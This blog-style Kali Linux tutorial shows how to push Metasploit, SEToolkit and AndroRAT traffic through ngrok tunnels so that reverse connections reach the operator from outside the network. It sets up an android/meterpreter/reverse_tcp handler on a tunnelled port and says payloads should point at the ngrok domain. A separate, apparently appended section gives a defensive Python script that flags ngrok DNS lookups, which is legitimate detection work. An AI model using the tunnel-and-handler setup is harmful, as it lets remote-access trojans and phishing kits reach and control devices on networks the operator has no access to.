
How to Use Metasploit, SEToolkit, AndroRAT Without Opening Ports in Kali Linux

July 5, 2017 / July 27, 2019

Limited access to ports on a network can be quite annoying and causes problems when pentesting, as you can only test traffic within the same network.

Unless, of course, you can open the correct ports from the router's default administration panel. There may be times when access to the administration panel is forbidden, for example if you are using a mobile hotspot; sometimes you can’t detect corporate networks, or you have spent the last hour and a half trying to learn how to do a port forward.

Whatever the case might be, here we will learn how to route connections through an external secure tunnel, allowing us to use various pentesting tools such as Metasploit and SEToolkit outside our network.

  • First of all, create a disposable email address using getnada.com or a similar disposable email service.
  • Download ngrok. In your browser go to ngrok.com and choose a download that suits your CPU architecture. Ngrok is a website that provides secure TCP tunnels for free. Once the download has completed, extract the Zip archive and then cd into it, for example “cd ngrok”.
    Download page for ngrok. I will be using the 32-bit build of ngrok in this tutorial; if you are using a modern 64-bit CPU, download the 64-bit version of ngrok.
  • Install your authtoken (the auth code below is an example; copy the auth token from your ngrok.com account). Copy the authentication code from your account on ngrok.com; we will be using this to authenticate our tunnel. You can do this by going to the folder where ngrok is stored and running “./ngrok authtoken yourauthtokenhere”. The authentication code will then be saved.
    Example authtoken

    ./ngrok authtoken UHTsJVmnmrninfibyuvtc_2b9xscccvdvdfsaq8f7z3

    Screenshot shows the ngrok auth code.

  • To create your first secure tunnel, use the command below to set up a tunnel on port 80. I’m using HTTP port 80 for SET; use whatever port you would like ngrok to tunnel through.
    ./ngrok http 80

    The screenshot shows ngrok successfully running a tunnel on HTTP port 80; the domain names in the screenshot are the external domains of your tunnel.
  • Open the web interface at http://localhost:4040 to inspect and replay requests in a web browser of your choice.

    Starting Metasploit

    First you will need to start ngrok using the tcp command, as Metasploit will be using a reverse TCP connection. Open up a new terminal and start Metasploit using the commands below.

    ./ngrok tcp 4444
    msfconsole

    Use your local host to set srvhost and lhost.

    set lhost 0.0.0.0
    set lport 4444
    set uripath /

    Use the port you used to set up ngrok as srvport; this will help us with tunneling a Metasploit or SEToolkit session through the Internet.

    In this tutorial I will set up a handler using the settings above for ngrok. Many reading this guide could be using completely different exploits; to minimize confusion we will show you how to set up a reverse TCP Meterpreter listener. This will help later when setting up tunnels with other pentesting tools that use reverse connections.

    msfconsole
     msf  > use multi/handler
     msf exploit(handler) > set payload android/meterpreter/reverse_tcp
     msf exploit(handler) > set LHOST 0.0.0.0
     msf exploit(handler) > set srvhost 0.0.0.0
     msf exploit(handler) > set srvport 4444
     msf exploit(handler) > set uripath /
     msf exploit(handler) > exploit

    When you are creating payloads for Metasploit you will need to include your tunnel and also the port you are using for ngrok.

    When creating payloads, use the domain provided by ngrok, or ping the domain to obtain an IP address and use that IP address from the results. Use the same port for the payload as your listener.

    Example SEToolkit

    setoolkit
    The screenshot below shows SEToolkit set up to use an external host.

    This will work as a tunnel for many more pentesting tools; this tutorial is not limited to Metasploit and SEToolkit.

We have listed more tools below that will work with ngrok.

Using AndroRAT

Generating Payloads with FatRAT
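
Seen from the network being tested, the tunnels set up in this tutorial show up as DNS lookups for ngrok hostnames. The following is an added example (not part of the original tutorial) that classifies such lookups in dnsmasq-style query logs; the sample log lines, the suffix lists and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Assumption: suffixes ngrok serves tunnels and agent traffic from; verify
# against ngrok's current documentation before relying on these lists.
TUNNEL_SUFFIXES = ("ngrok.io", "ngrok.app", "ngrok.dev", "ngrok-free.app")
AGENT_SUFFIXES = ("ngrok.com", "ngrok-agent.com")
TCP_ENDPOINT = re.compile(r"^\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io$")
QUERY = re.compile(r"query\[(?:A|AAAA)\] (\S+) from (\S+)$")

# Constructed dnsmasq-style query log lines (not real traffic).
SAMPLE_LOG = """\
Jul  5 10:01:02 dnsmasq[311]: query[A] tunnel.us.ngrok.com from 10.0.0.23
Jul  5 10:01:09 dnsmasq[311]: query[A] 0.tcp.ngrok.io from 10.0.0.41
Jul  5 10:02:17 dnsmasq[311]: query[A] a1b2c3d4.ngrok.io from 10.0.0.57
Jul  5 10:02:30 dnsmasq[311]: query[AAAA] www.example.org from 10.0.0.57
Jul  5 10:03:44 dnsmasq[311]: query[A] notngrok.io from 10.0.0.12
Jul  5 10:04:01 dnsmasq[311]: query[A] 0.TCP.ngrok.io. from 10.0.0.41
"""

def has_suffix(host, suffixes):
    # Match on a label boundary so "notngrok.io" is not treated as ngrok.io.
    return any(host == s or host.endswith("." + s) for s in suffixes)

def classify(host):
    host = host.lower().rstrip(".")
    if TCP_ENDPOINT.match(host):
        return "tcp-tunnel"   # raw TCP endpoint, as created by `ngrok tcp 4444`
    if has_suffix(host, TUNNEL_SUFFIXES):
        return "http-tunnel"  # HTTP endpoint, as created by `ngrok http 80`
    if has_suffix(host, AGENT_SUFFIXES):
        return "agent"        # ngrok site or agent control connection
    return None

def ngrok_activity(log_text):
    """Return {client_ip: {category: sorted hostnames}} for ngrok lookups."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in log_text.splitlines():
        m = QUERY.search(line)
        kind = classify(m.group(1)) if m else None
        if kind:
            hits[m.group(2)][kind].add(m.group(1).lower().rstrip("."))
    return {c: {k: sorted(v) for k, v in kinds.items()} for c, kinds in hits.items()}

if __name__ == "__main__":
    for client, kinds in sorted(ngrok_activity(SAMPLE_LOG).items()):
        print(client, kinds)
```

A client in the "agent" category is likely running or downloading ngrok itself, while "tcp-tunnel" and "http-tunnel" clients are connecting out to someone's tunnel and are the ones to triage first.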
